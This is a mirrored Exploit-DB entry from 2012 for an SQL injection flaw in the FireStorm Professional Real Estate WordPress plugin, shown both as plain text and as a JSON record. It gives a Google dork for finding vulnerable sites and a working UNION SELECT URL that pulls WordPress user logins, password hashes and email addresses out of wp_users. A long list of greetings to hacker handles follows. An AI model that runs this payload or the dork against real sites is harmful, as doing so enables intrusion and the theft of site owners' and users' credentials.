Search...

FireStorm Professional Real Estate WordPress Plugin 2.06.01 - SQL Injection Vulnerability

2012-10-18T00:00:00

ID EDB-ID:22071
Type exploitdb
Reporter Ashiyane Digital Security Team
Modified 2012-10-18T00:00:00

Description

FireStorm Professional Real Estate Wordpress Plugin 2.06.01 - SQL Injection Vulnerability. Webapps exploit for php platform

                                        
                                            # Exploit Title: Wordpress FireStorm Professional Real Estate 2.06.01 SQL Injection Vulnerability
# Google Dork: inurl:"/fs-real-estate-plugin/xml/marker_listings.xml?id="
# Exploit Author: Ashiyane Digital Security Team
# Software Link: http://www.firestormplugins.com/plugins/real-estate/
# Category: Web Application
# Version: 2.06.01
# Tested on: Windows 7
###############################################################
* Location:  http://site.com//wp-content/plugins/fs-real-estate-plugin/xml/marker_listings.xml?id=[SQL]
* Exploit Code: http://site.com//wp-content/plugins/fs-real-estate-plugin/xml/marker_listings.xml?id=1%20union%20all%20select%201,2,3,4,5,6,7,8,group_concat(user_login,char(58),user_pass,char(58),user_email),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from wp_users--
***************************************************************
* Greetz to: My Lord Allah
* Sp Tnx To: Behrooz_Ice,Q7X,Ali_Eagle,Azazel,iman_taktaz,sha2ow,0x21HATE,A.S.P.I.R.I.N,am118,Angel--D3m0n,angola,AR455,AzadÂ,Black-Hole,Classic,Encoder,ERroR,Hashor
* HASSAN20,HidDeEn,hossein19123,jooooondost,Kaz3m,ll_Invisible_ll,majidflash,megacpu,MehrdadLinux,Milad-Bushehr,MostafaBestMan,Mute,N4H,Pr0grammer,PrinceofHacking
* Rizux,rlsi2020,Rz04,S!YOU.T4r.6T,Sil3nt Di3,The Smith,unique2world,Unline,V!T0N,X-HIDDEN-X
* Crypt0,khatarnak,Milad22,MrR.CICILI,V1R4N64R,Pirjo
* And All Of My Friends 
* The Last One : My Self, Milwar 
***************************************************************
###############################################################

JSON Vulners Source

Initial Source

{"id": "EDB-ID:22071", "type": "exploitdb", "bulletinFamily": "exploit", "title": "FireStorm Professional Real Estate WordPress Plugin 2.06.01 - SQL Injection Vulnerability", "description": "FireStorm Professional Real Estate Wordpress Plugin 2.06.01 - SQL Injection Vulnerability. Webapps exploit for php platform", "published": "2012-10-18T00:00:00", "modified": "2012-10-18T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/22071/", "reporter": "Ashiyane Digital Security Team", "references": [], "cvelist": [], "lastseen": "2016-02-02T17:54:49", "viewCount": 10, "enchantments": {"score": {"value": -0.0, "vector": "NONE", "modified": "2016-02-02T17:54:49", "rev": 2}, "dependencies": {"references": [], "modified": "2016-02-02T17:54:49", "rev": 2}, "vulnersScore": -0.0}, "sourceHref": "https://www.exploit-db.com/download/22071/", "sourceData": "# Exploit Title: Wordpress FireStorm Professional Real Estate 2.06.01 SQL Injection Vulnerability\r\n# Google Dork: inurl:\"/fs-real-estate-plugin/xml/marker_listings.xml?id=\"\r\n# Exploit Author: Ashiyane Digital Security Team\r\n# Software Link: http://www.firestormplugins.com/plugins/real-estate/\r\n# Category: Web Application\r\n# Version: 2.06.01\r\n# Tested on: Windows 7\r\n###############################################################\r\n* Location: http://site.com//wp-content/plugins/fs-real-estate-plugin/xml/marker_listings.xml?id=[SQL]\r\n* Exploit Code: http://site.com//wp-content/plugins/fs-real-estate-plugin/xml/marker_listings.xml?id=1%20union%20all%20select%201,2,3,4,5,6,7,8,group_concat(user_login,char(58),user_pass,char(58),user_email),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from wp_users--\r\n***************************************************************\r\n* Greetz to: My Lord Allah\r\n* Sp Tnx To: Behrooz_Ice,Q7X,Ali_Eagle,Azazel,iman_taktaz,sha2ow,0x21HATE,A.S.P.I.R.I.N,am118,Angel--D3m0n,angola,AR455,Azad\u00c2\u0099,Black-Hole,Classic,Encoder,ERroR,Hashor\r\n* HASSAN20,HidDeEn,hossein19123,jooooondost,Kaz3m,ll_Invisible_ll,majidflash,megacpu,MehrdadLinux,Milad-Bushehr,MostafaBestMan,Mute,N4H,Pr0grammer,PrinceofHacking\r\n* Rizux,rlsi2020,Rz04,S!YOU.T4r.6T,Sil3nt Di3,The Smith,unique2world,Unline,V!T0N,X-HIDDEN-X\r\n* Crypt0,khatarnak,Milad22,MrR.CICILI,V1R4N64R,Pirjo\r\n* And All Of My Friends \r\n* The Last One : My Self, Milwar \r\n***************************************************************\r\n###############################################################\r\n", "osvdbidlist": ["86686"]}